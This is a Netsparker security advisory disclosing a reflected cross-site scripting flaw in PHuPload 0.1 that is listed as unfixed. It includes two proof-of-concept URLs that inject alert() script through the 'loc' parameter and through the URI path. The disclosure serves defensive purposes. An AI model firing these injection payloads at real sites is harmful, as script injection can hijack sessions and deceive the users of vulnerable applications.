Advisory by Netsparker
Name: Reflected XSS Vulnerability in PHuPload
Affected Software : PHuPload
Affected Versions: 0.1
Vendor Homepage :  
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-018

Technical Details

Proof of Concept URL for XSS vulnerability in PHuPload 0.1;

Url /PHuPload-0.1/index.php?op=upload&loc=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x000060)%3C/scRipt%3E
Parameter Name loc
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000060)</scRipt>

Url /PHuPload-0.1/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000C2)%3C/scRipt%3E
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0000C2)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
28 Mar 2017 - Advisory released


Credits & Authors
This issues has been discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website for more information.